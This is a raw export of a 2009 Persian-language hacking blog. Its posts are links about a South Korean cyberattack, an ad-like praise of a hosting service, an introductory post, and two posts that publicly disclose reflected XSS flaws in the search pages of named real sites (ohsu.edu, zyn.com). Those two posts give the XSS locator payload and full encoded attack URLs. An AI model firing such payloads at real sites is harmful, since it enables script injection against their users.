href="http://www.iritn.com/?action=show&type=news&id=4578"><span style="font-size:85%;">http://www.iritn.com/?action=show&type=news&id=4578</span></a><span style="font-size:85%;"><br /></span><a href="http://www.medianews.ir/fa/2008/10/15/korea.html"><span style="font-size:85%;">http://www.medianews.ir/fa/2008/10/15/korea.html</span><span style="font-size:85%;"><br /></span></a><a href="http://persianhack.com/show.aspx?id=1580"><span style="font-size:85%;">http://persianhack.com/show.aspx?id=1580</span></a><span style="font-size:85%;"><br /></span><div align="left" dir="ltr"><a href="http://iranictnews.ir/category/security/C_104751_____هشدار-کره-جنوبی-پس-از-حمله-سایبر.htm"><span style="font-size:85%;">http://iranictnews.ir/category/security/C_1047...</span></a><br /></div><div align="right">البته قصد دارم مقاله ای رو در باب چگونگی این حملات تهیه کنم که در یکی از نشریات و یا در همین وبلاگ منتشرش خواهم کرد !<br /><br /><div align="left"><span>پاینده باد ایران</span><br /></div></div><br /><br /><br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-4904447338587049614?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com1tag:blogger.com,1999:blog-7813959987674775070.post-64492872344407865312009-07-10T19:16:00.007+04:302009-07-13T12:42:52.662+04:30آسیب پذیری XSS : ohsu.edu<div dir="ltr" align="right"><div align="center"><strong><span>XSS : ohsu.edu</span></strong><br /></div><div dir="rtl" align="right">و باز هم ایکس اس اس مانند قبلی(در صفحه سرچ)...<br /></div><br /><div align="left"><span>Address:</span><br />www.ohsu.edu<br /></div><br /><div align="left"><span>Code: </span><br /></div><div dir="ltr" align="left"><div dir="ltr" align="left">;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//<br />";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'><br /><br /><div align="center"><a href="http://www.ohsu.edu/searchresults/controller.jsp?Ntt=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&Ntk=All&sid=1225A6DAB2E4">LINK</a><br /></div></div></div><div align="left"><br /></div><br /></div><br /><div align="center"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_HjC-UOu9N2Q/SldXy2TC3iI/AAAAAAAAAE0/Lfvza8zRWF4/s1600-h/1.gif"><img src="http://3.bp.blogspot.com/_HjC-UOu9N2Q/SldXy2TC3iI/AAAAAAAAAE0/Lfvza8zRWF4/s400/1.gif" alt="" id="BLOGGER_PHOTO_ID_5356846812860964386" border="0" /></a><br /><br /><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_HjC-UOu9N2Q/Slrr5ftlsUI/AAAAAAAAAFk/GYgUx4mAGfU/s1600-h/qw.gif"><img style="cursor: pointer; width: 400px; height: 241px;" src="http://3.bp.blogspot.com/_HjC-UOu9N2Q/Slrr5ftlsUI/AAAAAAAAAFk/GYgUx4mAGfU/s400/qw.gif" alt="" id="BLOGGER_PHOTO_ID_5357854079708410178" border="0" /></a><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_HjC-UOu9N2Q/SldXySfBSbI/AAAAAAAAAEs/bUMOA9AnGis/s1600-h/2.gif"><br /></a></div><br /><br /><div align="left"><span>پاینده باد ایران</span><br /></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-6449287234440786531?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-59944631547346304932009-07-08T16:55:00.002+04:302009-07-08T17:17:27.869+04:30پرشین گیگ،خانه ای برای توپرشین گیگ یکی از قدیمی ترین سرویس دهندگان Host در ایران هستش که به جرعت می شه گفت قویترین سرویس دهنده هم هست !<br />پرشین گیگ یک سرویس حرفه ای و در عین حال ساده هستش که می تونه نیاز تمام کاربرهاشو تامین کنه .<br />مدت زیادی بود که پرشین گیگ قصد داشت سرویس وبسایتشو راه اندازی کنه که مدتی هست این سرویس راه اندازی شده جا داشت بابت زحمات تیم حرفه ای www.persiangig.com تشکر کنم<br /><br /><br /><div align="left"><span><span style="color:#009900;">پاینده باد ایران</span></span><br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-5994463154734630493?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-91269483564900224102009-07-07T16:53:00.008+04:302009-07-14T16:23:48.009+04:30آسیب پذیری XSS : zyn.com<div align="center"><strong><span><span><span><span><span style="color: rgb(51, 204, 0);">XSS : zyn.com</span></span></span></span></span></strong><span><br /></span><div dir="rtl" align="right"><span><br /></span><div align="right"><span>سایت های زیادی مثل این وجود داره که اسکریپت زیر هک می شه ( توجه داسته باشید : بیشتر صفحات search این آسیب پذیری رو دارند .</span><div dir="ltr" align="left"><span><span><span><span style="color: rgb(255, 204, 51);">Code :</span></span></span></span><span><br /></span><span><span>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//</span><span><br /></span><span>";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'></span><span><br /></span></span><span><span><span><span style="color: rgb(255, 204, 51);">Address :</span></span></span><span><br /></span></span><span>http://www.zyn.com/sbir/sbres/sbcss.htm</span><div align="center"><span><a href="http://www.zyn.com/cgi-shl/Zsearch2.pl?keywords=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&indexname=sb-stall&display=20&search=Search+Solicitations"><strong><span>آسیب پذیری</span></strong></a></span></div><span><br /></span><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_HjC-UOu9N2Q/SlM-scjRAdI/AAAAAAAAADc/T67uzj7rWYY/s1600-h/1.gif"><img src="http://4.bp.blogspot.com/_HjC-UOu9N2Q/SlM-scjRAdI/AAAAAAAAADc/T67uzj7rWYY/s400/1.gif" alt="" id="BLOGGER_PHOTO_ID_5355693315172925906" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_HjC-UOu9N2Q/SlsaSTrpqWI/AAAAAAAAAF8/AB6XLUhBinc/s1600-h/sss.gif"><img style="cursor: pointer; width: 400px; height: 241px;" src="http://4.bp.blogspot.com/_HjC-UOu9N2Q/SlsaSTrpqWI/AAAAAAAAAF8/AB6XLUhBinc/s400/sss.gif" alt="" id="BLOGGER_PHOTO_ID_5357905083510663522" border="0" /></a><br /><br /><br /></div><span><span><span style="color: rgb(0, 153, 0);">پاینده باد ایران</span></span></span><span><br /></span></div></div><br /><br /></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-9126948356490022410?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-52524951298964182782009-07-06T21:10:00.004+04:302009-07-07T17:19:40.451+04:30آغاز به کار<div align="right" dir="rtl"><br /><span><span><span><span>با سلام به تمامی دوستان از این پس در این وبلاگ مطالب پژوهشی در زمینه ی علوم هک رو قرار می دم<br />مطالب ارائه شده در زمینه های مختلف علوم هکینگ و امنیت هستش<br /><br /></span></span></span><span><span><br />با سپاس</span></span></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-5252495129896418278?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0